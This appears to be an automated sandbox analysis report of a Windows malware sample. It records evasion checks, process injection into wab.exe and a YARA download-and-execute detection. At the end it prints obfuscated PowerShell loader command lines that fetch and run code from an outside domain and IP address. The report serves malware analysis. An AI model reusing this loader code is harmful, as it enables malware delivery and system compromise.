Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 54446C1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6017	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3760	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6217	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3527	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3124	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2545	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3493	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6416	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6156	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep count: 6217 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep count: 3527 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3796	Thread sleep count: 3124 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep count: 2545 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep time: -7635000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep count: 3493 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep time: -10479000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 3124 delay: -5

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 00000000.00000003.1679476616.000001816A4E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1679903004.000001816A4F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceStoppedOKvmicguestinterfacevmicguestinterfaceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceHyper-V Guest Service InterfaceWin32_ServiceWin32_ComputerSystemuser-PCvmicguestinterfaceLMEM@
Source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: powershell.exe, 00000001.00000002.2496319652.000001703AE17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000003.1679207996.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682876301.000001816A468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657076648.000001816A441000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682876301.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656487203.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656928856.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679947682.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679947682.000001816A467000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1683906838.000001816A51F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679136591.000001816A504000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680099067.000001816A51E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: icshutdownHyper-V Ti*v
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
Source: wscript.exe, 00000000.00000002.1683801671.000001816A4FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: desktop virtualization servicevmicshutdownhyper-v time synchronization servicehyper-v powershell direct servicevmicvssvolume shadow copywindows timewalletservicewarpjitsvcblock level backup engine servicewindows biometric servicewindows connection managerwindows connect now - config registrardiagnostic service hostdiagnostic system hostmicrosoft defender antivirus network inspection servicewebclientwindows event collectorwindows encryption provider host serviceproblem reports control panel supportwindows error reporting servicewi-fi direct services connection manager servicestill image acquisition eventsmicrosoft defender antivirus servicewinhttp web proxy auto-discovery servicewindows management instrumentationwindows remote management (ws-management)windows insider servicewlan autoconfigmicrosoft account sign-in assistantlocal profile assistant servicewindows management servicewmi performance adapterwindows media player network sharing servicework foldersparental controlsportable device enumerator servicewindows push notifications system servicesecurity centerwindows searchwindows updatewwan autoconfigxbox live auth managerxbox live game savexbox accessory management servicexbox live networking serviceagent activation runtime_26d39gamedvr and broadcast user service_26d39bluetooth user support service_26d39captureservice_26d39clipboard user service_26d39connected devices platform user service_26d39consentux_26d39credentialenrollmentmanagerusersvc_26d39deviceassociationbroker_26d39devicepicker_26d39devicesflow_26d39messagingservice_26d39sync host_26d39contact data_26d39printworkflow_26d39udk user service_26d39user data storage_26d39user data access_26d39windows push notifications user service_26d393
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_4412.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 275F89C			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
